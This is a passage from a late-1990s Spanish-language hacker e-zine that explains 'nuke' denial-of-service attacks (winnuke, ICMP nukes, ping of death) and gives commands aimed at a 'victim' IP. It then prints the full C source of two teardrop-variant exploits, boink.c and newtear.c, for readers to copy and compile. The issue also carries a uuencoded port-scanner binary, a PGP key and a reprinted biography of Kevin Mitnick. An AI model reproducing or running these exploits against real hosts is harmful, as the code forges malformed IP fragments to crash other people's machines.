Los famosos winnuke, popularisimo en IRC se llama winnuke ya que solo afecta a las maquinas que usa guindoze . El ataque consiste en mandarle el flag OOB que signifca fuera de banda (out of band) a algun puerto normalmente el 139 , produciendo asi un lindo pantallazo azul con el tipico mensaje de guindoze de volcado de pila , obligando al usuario a reiniciar su maquina... jejeje .- este bug esta ampliamente parchado .
Si quereis chequear si estas protegido contra este nuke , haz lo siguiente... cierra todos los + programas que puedas y entra en la siguiente direccion.
http://xuxa.gr.ssr.upm.es/cgi-bin/winnuke .- si te caes ya sabes, buscate el parche o prueba renombrando el archivo c:\windows\system\vnbt.386 por c:\windows\system\vnbt.bak .
ICMP Nuke
El icmp es un subprotocolo de IP, que es el encargado de informar los errores producidos durante la transmision de paquetes, Ahora aprovechando nuevamente que TCP/IP es un protocolo abierto que podemos manejar a nuestro antojo (bueno no es tan asi yo nunca he modificado un paquete a mano) lo que hacemos es mandar paquetes con ICMP errors a la vicitma podemos desconectarlo de la red.
Ping de la Muerte
Bueno la utilidad ping es la encargada de verificar conexiones, tiempo de respuestas etc... ahora podemos adaptarlo para atacar a alguien .... ;)) como??? muy simple podemos cambiar el tamaño de los paquetes de tal forma que la victima al momento de ordenarlos para enviar la respuesta , ya esta recibiendo el otro paquete de tal forma que se crea un atochamiento de paquetes , de tal forma que no es capaz de mantenerse conectado y zapp se cae.
desde guindoze seria de la sgte forma.
c:\windows>ping -l 65510 <ip de la vicitma> -t
desde Unix seria.
$ ping -s 32000 <direcc. IP>
Problemas con impresion: Es sabido que cuando se manejan impresoras en Red Novell dentro de win95, misteriosamente desaparecen del grupo configuracion. Ya me ha tocado varias veces verificar usuarios que no pueden imprimir y cuando se va a verificar el estado de las impresoras, Han desaparecido de la configuracion :- SOlucion RESETEO .
Incompatible con novell: La verdad que trabajar con Novell y Windoze se hace cada vez mas dificil, ya que el cliente para redes Novell de Microsoft, no permite el funcionamiento de los script de inicio, los mapeos por defecto y lo que es peor no permite que el usuario cambie su password en novell.
Solucion .- Instalar el Cliente32 de Novell pero este cliente te mas lento er Windoze (no se si a proposito), y crea un lio en las password que el usuario pocas veces entiende, en especial si corres una red NT en paralelo .
Bueno este es el primer capitulo de esta saga, para la proxima esperamos tener algunas sorpresas sobre WIndoze NT y 95, y quizas aparezca algun articulillo de Mierdows 98 .- pero no nos despediremos sin dejar con ustedes un par de codigos fuentes de un par de Nukes que son unas variantes del conocido Teardrop.
NOTA .- Estamos experimentando con el archivo services de Guindoze a ver si sacamos provecho de este y tal vez encontramos algo entretenido que se pueda hacer, pero ya esta abierta la idea, a trabajar se ha dicho .
Copia el codigo entre los asteriscos , sin los asteriscos .
****************Boink.c ********************************************************
/*
boink.c - a modified bonk.c
==bendi - 1998==
bonk.c - 5/01/1998
Based On: teardrop.c by route|daemon9 & klepto
Crashes *patched* win95/(NT?) machines.
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_udp.h>
#include <netinet/protocols.h>
#include <arpa/inet.h>
#define FRG_CONST 0x3
#define PADDING 0x1c
struct udp_pkt
{
struct iphdr ip;
struct udphdr udp;
char data[PADDING];
} pkt;
int udplen=sizeof(struct udphdr),
iplen=sizeof(struct iphdr),
datalen=100,
psize=sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING,
spf_sck; /* Socket */
void usage(void)
{
/* fprintf(stderr, "Usage: ./bonk <src_addr> <dst_addr> [num]\n"); */
fprintf (stderr, "Usage: ./boink <src_addr> <dst_addr> <start_port> <stop_port> [num]\n");
exit(0);
}
u_long host_to_ip(char *host_name)
{
static u_long ip_bytes;
struct hostent *res;
res = gethostbyname(host_name);
if (res == NULL)
return (0);
memcpy(&ip_bytes, res->h_addr, res->h_length);
return (ip_bytes);
}
void quit(char *reason)
{
perror(reason);
close(spf_sck);
exit(-1);
}
int fondle(int sck, u_long src_addr, u_long dst_addr, int src_prt,
int dst_prt)
{
int bs;
struct sockaddr_in to;
memset(&pkt, 0, psize);
/* Fill in ip header */
pkt.ip.version = 4;
pkt.ip.ihl = 5;
pkt.ip.tot_len = htons(udplen + iplen + PADDING);
pkt.ip.id = htons(0x455);
pkt.ip.ttl = 255;
pkt.ip.protocol = IP_UDP;
pkt.ip.saddr = src_addr;
pkt.ip.daddr = dst_addr;
pkt.ip.frag_off = htons(0x2000); /* more to come */
pkt.udp.source = htons(src_prt); /* udp header */
pkt.udp.dest = htons(dst_prt);
pkt.udp.len = htons(8 + PADDING);
/* send 1st frag */
to.sin_family = AF_INET;
to.sin_port = src_prt;
to.sin_addr.s_addr = dst_addr;
bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
sizeof(struct sockaddr));
pkt.ip.frag_off = htons(FRG_CONST + 1); /* shinanigan */
pkt.ip.tot_len = htons(iplen + FRG_CONST);
/* 2nd frag */
bs = sendto(sck, &pkt, iplen + FRG_CONST + 1, 0,
(struct sockaddr *) &to, sizeof(struct sockaddr));
return bs;
}
void main(int argc, char *argv[])
{
u_long src_addr,
dst_addr;
int i,
/* src_prt = 55,
dst_prt = 55, */
start_port,
stop_port,
bs = 1,
pkt_count;
if (argc < 5)
usage();
start_port = (u_short) atoi (argv[ 3 ]);
stop_port = (u_short) atoi (argv[ 4 ]);
if (argc == 6)
pkt_count = atoi (argv[ 5 ]);
if (start_port >= stop_port ||
stop_port <= start_port) {
start_port = 25;
stop_port = 65;
}
if (pkt_count == 0) pkt_count = 10;
/* Resolve hostnames */
src_addr = host_to_ip(argv[1]);
if (!src_addr)
quit("bad source host");
dst_addr = host_to_ip(argv[2]);
if (!dst_addr)
quit("bad target host");
spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (!spf_sck)
quit("socket()");
if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *) &bs,
sizeof(bs)) < 0)
quit("IP_HDRINCL");
for (i = 0; i < pkt_count; ++i)
{
int j;
printf ("(%d)%s:%d->%d\n", i, argv[ 2 ], start_port, stop_port);
for (j = start_port; j != stop_port; j++) {
/* fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt); */
fondle (spf_sck, src_addr, dst_addr, j, j);
}
usleep(10000);
}
printf("Done.\n");
}
*******************fin del boink.c*************************************************
Copia el codigo entre los asteriscos , sin los asteriscos .-
*******************newtear.c*********************************************************
/* Newtear.c
* Seemingly, a new teardrop type exploit. Affects NT4, and Win95.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define PADDING 0x14 /* datagram frame padding for first packet */ /* JD Change pad size to 20 decimal. */
#define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */
#define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can
* withstand maybe 5 or 10 sometimes... Experiment.
*/
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);
int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
struct in_addr addr;
fprintf(stderr, "teardrop route|daemon9\n\n");
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
< 0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc < 3) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, "What the hell kind of IP address is that?\n");
exit(1);
}
while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;
fprintf(stderr, "Death on flaxen wings:\n");
addr.s_addr = src_ip;
fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
fprintf(stderr, " Amt: %5d\n", count);
fprintf(stderr, "[ ");
for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
fprintf(stderr, "b00m ");
usleep(500);
}
fprintf(stderr, "]\n");
return (0);
}
/*
* Send two IP fragments with pathological offsets. We use an implementation
* independent way of assembling network packets that does not rely on any of
* the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
*/
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt)
{
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */
sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;
/*
* Grab some memory for our packet, align p_ptr to point at the beginning
* of our packet, and then fill it with zeros.
*/
packet = (u_char *)malloc(IPH + UDPH + PADDING);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING); // Set it all to zero
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + PADDING*2); /* UDP total length */ /* Increases UDP total length to 48 bytes
Which is too big! */
if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
/* We set the fragment offset to be inside of the previous packet's
* payload (it overlaps inside the previous packet) but do not include
* enough payload to cover complete the datagram. Just the header will
* do, but to crash NT/95 machines, a bit larger of packet seems to work
* better.
*/
p_ptr = &packet[2]; /* IP total length is 2 bytes into the header */
*((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
p_ptr += 4; /* IP offset is 6 bytes into the header */
*((u_short *)p_ptr) = FIX(MAGIC);
if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}
u_long name_resolve(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}
void usage(u_char *name)
{
fprintf(stderr,
"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
name);
exit(0);
}
/* EOF */
******************** Fin de newtear.c ********************************************
Cualquier comentario, critica o correccion a este articulo , por favor hacerla llegar a PlaXiuS : plaxius@bigfoot.com
Estamos abiertos a caulquier sugerencia
SIETE. Fin
Bueno aqui quiero terminar... se me hizo un poco largo el primer e-zine, y con un monton de textos sacados de otras revistas.
Me despido esperando sus colaboraciones y textos... sus preguntas y sugerencias, para que, como dije, este e-zine sea un buen sitio de encuentro para el H/P/V/C/I colombiano.
Ah... antes de que se me olvide, mi pagina con muchos textos de estos (en ingles y en español, pues estoy tratando de traducir la mayoria) es:
http://www.warez.com/users/silence
o
http://travel.to/silence
En ella esta la subscripcion a una lista de correo para H/P en español... y en Colombia.
Gracias por ayudar...
mR. sILENCE
mr.silence@usa.net
(otra vez...)
OCHO. PGP
mR. sILENCE
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use
mQGiBDZyl3sRBAD49tLlvtvsYKEKL7+dIh86ZM2W1xzd4IkNzPLkE+isf7UohuL6
CzFzVMp/bHqsTdvKlYYtseO1WQFSe8isnOlX//7RJ9SonXTME4EeShscHQTDbq0k
00sGc4XEghEMIs0X0g7uyeg4go8Tx/75FvbVHqCjFnmFQW+6kImO7yu29wCg/8JY
qKsGWL/FGHY3RgrC2rGAIiUD/2tp3AsC3V18RZXoLk3zAJrQIl8yS+Kq/hXcSgvM
XrPnHJbBUh7fn1DEaKx0pzaifQ5BOP3iDyjO9hxbo0B80/Z6uV7MlrVGLc9hQZLA
qFkL43/ZDK41sZ6tCQsFPJfp8lA2Fz1v/8Mk4lYPWYar6esrNXD74bhXwQrGWj+R
btk9A/9r5A3q59BFFLTSMRGGWGIswdo2KczpZPimkfj7BSvkctkQnzhlyJHSARYT
Iv1YnVYgIhxjAy/WzKhbNy8VNRrGj3zgabNhLDPXr7DRX03XQiLRpMNj4jtglXHZ
8YXJsRhCu1wAiH/CaUwwsctJ+xw7qQ4HoNrd7YYZRDwRDg1VMLQgTXIuIHNpbGVu
Y2UgPG1yLnNpbGVuY2VAdXNhLm5ldD6JAEsEEBECAAsFAjZyl3sECwMBAgAKCRC9
dP2/lyfK3RNhAKCKQ94tXKq6wPlx/4aJqifOx3Zu+ACfW03OMHqSz9DmMNyDiWM7
fpyxXqW5Ag0ENnKXexAIAPZCV7cIfwgXcqK61qlC8wXo+VMROU+28W65Szgg2gGn
VqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh01D49Vlf3HZSTz09jdvOmeFX
klnN/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscBqtNbno2gpXI61Brwv0YAWCvl
9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFstjvbzySPAQ/ClWxiNjrtVjLhd
ONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISnCnLWhsQDGcgHKXrKlQzZlp+r
0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVekyCzsAAgIH/2ZPJj3ML2lobE92
I33qB0XMnwhuYLDlNxe2XakwZo46RunDkFuWVRjnyjJLZLVDDL34EeE4P11rVzNs
4Rf9odllHMhHmV8vXSbIdYPUTPzSjmkrNPUIHLHDWq/ZgM9FxekjGyA69nMXIoQ3
qqT4VD2Pn9rsnKEb8PO/Ujyhzot+YDglWsVIK96xPHlaVbqXGYKlUl93YLs5WOtN
K+NnaER13+dzJxKcQKTX4bbwEpKLgKKNlReWrGO/dhdQRjufoZ5yDTaOKzSVKn8M
G9AMDMBXYR8eokTc7iHtLuR0qYvQ4XJxr8sX3W11ntDFPdacB776x3o4cscjsGi7
ToFQmi+JAD8DBRg2cpd7vXT9v5cnyt0RAsCCAJ94J4+IuwFJ5+H85HVPNqYT831e
tQCfccH2HAdHbT4UmbMcDzlm24uTUw4=
=mR7J
-----END PGP PUBLIC KEY BLOCK-----
NUEVE. Aplicaciones
Esta se las dejo de tarea...
Si no saben UUDECODE les toca aprender...
Esta utilidad no es lo que llamarian "lo ultimo en guaracha" pero si es util para escanear puertos en varias IP.
section 1 of uuencode 5.25 of file domscan.zip by R.E.M.
begin 644 domscan.zip
M4$L#!!0````(`&$4Y"+$Z%WW-2$```!4```+````9&]M<V-A;BYE>&7L6@U0
M7-=U/@LK6&$D5C+(LJV?U8]MQ;499"0;2<A^$CP$#@MO=[6+IA&2$.QFP8@E
...
M!$90A*F@_4>$QT#W-<)!X8@0(S*B5UPAKA$WB]O$H9?>_X?P;U!+`0(R"Q0`
M```(`&$4Y"+$Z%WW-2$```!4```+````````````(`#_@0````!D;VUS8V%N
:+F5X95!+!08``````0`!`#D```!>(0``````
`
end
sum -r/size 54283/11908 section (from "begin" to "end")
sum -r/size 7044/8621 entire input file
DIEZ. Bye
Kevin.TXT
Texto extractado de ZeD-wOrLd-EzInE num.4
Mi aporte a la causa de Kevin Mitnick
tambiÈn m·s informaciÛn y notas en:
http://members.xoom.com/Aflame/historia.html
mR. sILENCE
mr.silence@usa.net
La Historia del Chacal de la Red
NOTA DE LA REDACCION (osea de ZeD):
Este texto lo he bajado de la web oficial de RAREGAZZ, a la cual podeis acceder desde esta direccion: http://raregazz.acapulco.uagro.mx
Como Hacker la carrera de Kevin Mitnick comenzo a los 16 años, cuando -obsesionado por las redes de computadoras- rompio la seguridad del sistema administrativo de su colegio.
Escrito por: Gilberto Pagua
Mr. Mitnick.
Todo aquel que sea conceptualizado como un Internauta se caracteriza por utilizar un telefono, un modem y una computadora para muchos fines diferentes: Divertirnos, informarnos, estudiar, cocinar, planificar viajes y otras actividades que amplian nuestro quehacer diario. Para Kevin Mitnick el quehacer diario en sus ultimos diez años fue el explorar y "explotar" computadoras ajenas y sistemas telefonicos. øSu profesion? "Hacker" de nacimiento.
Este "terrorista electronico", como lo cataloga el Departamento de Justicia de los Estados Unidos, conocido en los medios como el "Condor", fue capaz de crear numeros telefonicos imposibles de facturar (para la compañia telefonica el era James Bond, con un numero que terminaba en 007), pudo apropiarse de 20.000 numeros de tarjetas de credito de habitantes de California y burlarse del FBI por mas de dos años con solo un telefono celular alterado y un computador portatil.
Es la peor pesadilla de las empresas de telefonia. Es sospechoso de robar el software de mas de media docena de fabricantes de telefonos celulares y tenia el control de tres oficinas centrales de telefonos en Manhattan y de todos los centros de conmutacion de California, dandole la habilidad de escuchar cualquier conversacion telefonica o, si no eras una persona de su agrado, modificar el telefono de tu casa de tal manera que, cada vez que levantaras el auricular, una grabadora pedia que depositaras 25 centavos.
¿Como se forma un Hacker?
Como Hacker, la carrera de Mitnick tiene sus inicios en 1980 cuando apenas contaba 16 años y, obsesionado por las redes de computadoras, rompio la seguridad del sistema administrativo de su colegio, pero no para alterar sus notas, lo hizo "solo para mirar". Su bautizo como infractor de la ley fue en 1981. Junto a dos amigos entro fisicamente a las oficinas de COSMOS de Pacific Bell. COSMOS (Computer System for Mainframe Operations) era una base de datos utilizada por la mayor parte de las compañias telefonicas norteamericanas para controlar el registro de llamadas. Una vez dentro de las oficinas obtuvieron la lista de claves de seguridad, la combinacion de las puertas de acceso de varias sucursales y manuales del sistema COSMOS. La informacion robada tenia un valor equivalente a los 200 mil dolares. Fueron delatados por la novia de uno de los amigos y debido a su minoria de edad una Corte Juvenil lo sentencio a tres meses de carcel y a un año bajo libertad condicional.
Luego de cumplido el periodo de tres meses el oficial custodio encargado de su caso encontro que su telefono fue desconectado y que en la compañia telefonica no habia ningun registro de el.
Sus objetivos iban creciendo a cada paso y en 1982 entro ilegalmente, via modem, a la computadora del North American Air Defense Command en Colorado. Antes de entrar altero el programa encargado de rastrear la procedencia de las llamadas y desvio el rastro de su llamada a otro lugar. El FBI, creyendo que habia hallado a Mitnick, allano la casa de unos inmigrantes que estaban viendo television.
Un año mas tarde fue arrestado de nuevo cuando era estudiante de la Universidad del Sur de California. En esta ocasion entro ilegalmente a ARPAnet (la predecesora de Internet) y trato de accesar a la computadora del Pentagono. Lo sentenciaron a seis meses de carcel en una prision juvenil en California.
En 1987, luego de tratar de poner su vida en orden, cayo ante la tentacion y fue acusado, en Santa Cruz California, de invadir el sistema de la compañia Microcorp Systems. Lo sentenciaron a tres años de libertad condicional y luego de la sentencia su expediente desaparecio de la computadora de la policia local.
Luego busco trabajo en lo que mejor sabia hacer y solicito empleo en el Security Pacific Bank como encargado de la seguridad de la red del banco. El banco lo rechazo por sus antecedentes penales y Mitnick falsifico un balance general del banco donde se mostraban perdidas por 400 millones de dolares y trato de enviarlo por la red. Afortunadamente el administrador de la red detuvo el balance antes de que viera la luz.
Ese mismo año inicio el escandalo que lo lanzo a la fama. Durante meses observo secretamente el correo electronico de los miembros del departamento de seguridad de MCI Communications y Digital Equipment Corporation para conocer como estaban protegidos las computadoras y el sistema telefonico de ambas compañias.
Luego de recoger suficiente informacion se apodero de 16 codigos de seguridad de MCI y junto a un amigo, Lenny DiCicco, entraron a la red del laboratorio de investigaciones de Digital Corporation, conocida como Easynet. Ambos Hackers querian obtener una copia del prototipo del nuevo sistema operativo de seguridad de Digital llamado VMS. El personal de seguridad de Digital se dio cuenta inmediatamente del ataque y dieron aviso al FBI, y comenzaron a rastrear a los hackers.
Mitnick fue un mal complice y, a pesar de que habian trabajado juntos, trato de echarle toda la culpa a DiCicco haciendo llamadas anonimas al jefe de este que trabajaba en una compañia de software como tecnico de soporte. Lleno de rabia y frustracion DiCicco le confeso todo a su jefe que los denuncio a Digital y al FBI.
Mitnick fue arrestado en 1988 por invadir el sistema de Digital Equipment. La empresa acuso a Mitnick y a DiCicco ante un juez federal de causarles daños por 4 millones de dolares en el robo de su sistema operativo. Fue declarado culpable de un cargo de fraude en computadoras y de uno por posesion ilegal de codigos de acceso de larga distancia.
Adicional a la sentencia el fiscal obtuvo una orden de la corte que prohibia a Mitnick el uso del telefono en la prision alegando que el prisionero podria obtener acceso a las computadoras a traves de cualquier telefono. A peticion de Mitnick el juez lo autorizo a llamar unicamente a su abogado, a su esposa, a su madre y a su abuela y solo bajo supervision de un oficial de la prision.
Este caso produjo revuelo en los Estados Unidos, no solo por el hecho delictivo sino por la tactica que utilizo la defensa. Su abogado convencio al juez que Mitnick sufria de una adiccion por las computadoras equivalente a la de un drogadicto, un alcoholico o un apostador. Gracias a esta maniobra de la defensa Mitnick fue sentenciado a solo un año de prision y al salir de alli debia seguir un programa de seis meses para tratar su "adiccion a las computadoras". Durante su tratamiento le fue prohibido tocar una computadora o un modem y llego a perder mas de 45 kilos.
Para 1991 ya era el Hacker que habia ocupado la primera plana del New York Times y uno de sus reporteros, John Markoff, decidio escribir un libro de estilo Cyberpunk narrando las aventuras de Mitnick. Al parecer a Mitnick no le gusto el libro ya que luego de salir a la venta, la cuenta en Internet de Markoff fue invadida, cambiando su nivel de acceso, de manera de que cualquier persona en el mundo conectada a Internet podia ver su correo electronico.
En 1992, y luego de concluir su programa, Mitnick comenzo a trabajar en una agencia de detectives. Pronto se descubrio un manejo ilegal en el uso de la base de datos y fue objeto de una investigacion por parte del FBI quien determino que habia violado los terminos de su libertad condicional. Allanaron su casa pero habia desaparecido sin dejar rastro alguno. Ahora Mitnick se habia convertido en un Hacker profugo.
El fiscal no estaba tan equivocado cuando pidio la restriccion del uso del telefono. Tambien en 1992, el Departamento de Vehiculos de California ofrecio una recompensa de 1 millon de dolares a quien arrestara a Mitnick por haber tratado de obtener una licencia de conducir de manera fraudulenta, utilizando un codigo de acceso y enviando sus datos via fax.
El Fin
Luego de convertirse en profugo de la justicia cambio de tactica y concluyo que la mejor manera de no ser rastreado era utilizando telefonos celulares. De esta manera podria cometer sus fechorias y no estar atado a ningun lugar fijo. Para ello necesitaba obtener programas que le permitieran moverse con la misma facilidad con que lo hacia en la red telefonica.
Luego de varios intentos infructuosos, en cuanto a calidad de informacion, se encontro con la computadora de Tsutomu Shimomura la cual invadio en la Navidad de 1994. Shimomura, fisico computista y experto en sistemas de seguridad del San Diego Supercomputer Center, era ademas un muy buen Hacker, pero era de los "chicos buenos", ya que cuando hallaba una falla de seguridad en algun sistema lo reportaba a las autoridades, no a otros Hackers.
Shimomura noto que alguien habia invadido su computadora en su ausencia, utilizando un metodo de intrusion muy sofisticado y que el nunca antes habia visto. El intruso le habia robado su correo electronico, software para el control de telefonos celulares y varias herramientas de seguridad en Internet. Alli comenzo la cuenta regresiva para Mitnick. Shimomura se propuso como orgullo personal atrapar al Hacker que habia invadido su privacidad.
Hacia finales de enero de 1995, el software de Shimomura fue hallado en una cuenta en The Well, un proveedor de Internet en California. Mitnick habia creado una cuenta fantasma en ese proveedor y desde alli utilizaba las herramientas de Shimomura para lanzar ataques hacia una docena de corporaciones de computadoras, entre ellas Motorola, Apple y Qualcomm.
Shimomura se reunio con el gerente de The Well y con un tecnico de Sprint (proveedor de servicios telefonicos celulares) y descubrieron que Mitnick habia creado un numero celular fantasma para accesar el sistema. Luego de dos semanas de rastreos determinaron que las llamadas provenian de Raleigh, California.
Al llegar Shimomura a Raleigh recibio una llamada del experto en seguridad de InterNex, otro proveedor de Internet en California. Mitnick habia invadido otra vez el sistema de InterNex, habia creado una cuenta de nombre Nancy, borrado una con el nombre Bob y habia cambiado varias claves de seguridad incluyendo la del experto y la del gerente del sistema que posee los privilegios mas altos. De igual manera Shimomura tenia informacion sobre la invasion de Mitcnick a Netcom, una red de base de datos de noticias.
Shimomura se comunico con el FBI y estos enviaron a un grupo de rastreo por radio. El equipo de rastreo poseia un simulador de celda, un equipo normalmente utilizado para probar telefonos celulares pero modificado para rastrear el telefono de Mitnick mientras este esta encendido y aunque no este en uso. Con este aparato el celular se convertiria en un transmisor sin que el usuario lo supiera.
A medianoche terminaron de colocar los equipos en una Van y comenzo la busqueda de la señal, porque eso era lo que querian localizar; no buscaban a un hombre porque todas las fotos que tenian eran viejas y no estaban seguros de su aspecto actual, el objetivo de esa noche era determinar el lugar de procedencia de la señal. Ya para la madrugada localizaron la señal en un grupo de apartamentos pero no pudieron determinar en cual debido a interferencias en la señal.
Mientras esto ocurria la gente de InterNex, The Well y Netcom estaban preocupados por los movimientos que casi simultaneamente Mitnick hacia en cada uno de estos sistemas. Cambiaba claves de acceso que el mismo habia creado y que tenian menos de 12 horas de creadas, utilizando codigos extraños e ironicos como no,panix, fukhood y fuckjkt. Estaba creando nuevas cuentas con mayores niveles de seguridad como si sospechara que lo estaban vigilando.
El FBI, Shimomura y el equipo de Sprint se habian reunido para planificar la captura. Shimomura envio un mensaje codificado al buscapersonas del encargado en Netcom para advertirle que el arresto se iba a realizar al dia siguiente, 16 de Febrero.
Shimomura envio el mensaje varias veces por equivocacion y el encargado interpreto que Mitnick ya habia sido arrestado adelantandose a realizar una copia de respaldo de todo el material que Mitnick habia almacenado en Netcom como evidencia y borrando las versiones almacenadas por Mitnick. Habia que realizar el arresto de inmediato, antes de que Mitnick se diera cuenta de que su informacion habia sido borrada.
Cuando faltaban minutos para dar la orden el simulador de celdas detecto una nueva señal de transmision de datos via celular y simultanea a la de Mitnick, muy cerca de esa zona. Algo extraño estaba haciendo Mitnick con las lineas celulares, Shimomura trato de advertirle al agente del FBI pero ya todo estaba en manos de ellos, Shimomura de ahora en adelante no era mas que un espectador privilegiado. El FBI no pensaban hacer una entrada violenta porque no creian que Mitnick estuviera armado, pero tenian que actuar muy rapido porque sabian el daño que este hombre podia causar en un solo minuto con una computadora. Se acercaron lentamente hasta la entrada del apartamento de Mitnick y anunciaron su presencia, si no les abrian la puerta en cinco segundos la echarian abajo. Mitnick abrio la puerta con toda calma y el FBI procedio a arrestarlo y a decomisar todo el material pertinente discos, computador, telefonos celulares, manuales, etc.
De regreso a su hotel Shimomura decide chequear la contestadora telefonica de su residencia en San Diego. Se quedo en una pieza cuando escucho la voz de Mitnick quien le habia dejado varios mensajes con acento oriental en tono de burla. El ultimo de estos mensajes lo habia recibido ocho horas despues de que Mitnick habia sido arrestado y antes de que la prensa se hubiera enterado de todo el asunto. Como se realizo esa llamada aun es un misterio al igual que el origen y objetivo de la segunda señal de Mitnick.
Este persistente hacker actualmente esta siendo juzgado y enfrenta dos cargos federales, uso ilegal de equipos de acceso telefonico y fraude por computadoras. Puede ser condenado por hasta 35 años y a pagar una multa de hasta medio millon de dolares. Mitnick tambien es sospechoso de robar el software que las compañias telefonicas piensan usar para todo tipo de procesos, desde la facturacion hasta el seguimiento del origen de una llamada pasando por la decodificacion de las señales de los telefonos celulares para preservar su privacidad.
El vuelo final
Todos los cargos bajo los cuales
ha sido acusado Kevin Mitnick podrian
suponerle mas de doscientos años
de prision si es declarado culpable
"No culpable" alcanzo a declararse Kevin Mitnick ante el Gran Jurado de California, que el pasado 30 de septiembre lo acuso de 25 cargos por los cuales podria ser condenado a mas de doscientos años de presidio.
"Esta acusacion revela el amplio daño que Mitnick causo mientras era un fugitivo de la justicia. Los delitos por computadora permiten a sofisticados criminales causar estragos alrededor del mundo usando solo una computadora y un modem como sus armas. Queremos con esta acusacion dar un paso adelante en los esfuerzos federales por perseguir y capturar a los hackers" dijo la fiscal encargada del caso, Nora Manella. Los cargos por los que fue acusado Mitnick y su ayudante Lewis Depayne, de 36 años, incluyen el robo de software, fraude electronico, daño a las computadoras de la Universidad del Sur de California, robo de archivos electronicos e intercepcion de mensajes de correo electronico. Entre las compañias afectadas por las actividades del llamado "Condor" se cuentan Motorola, Nokia, Fujitsu y Nec.
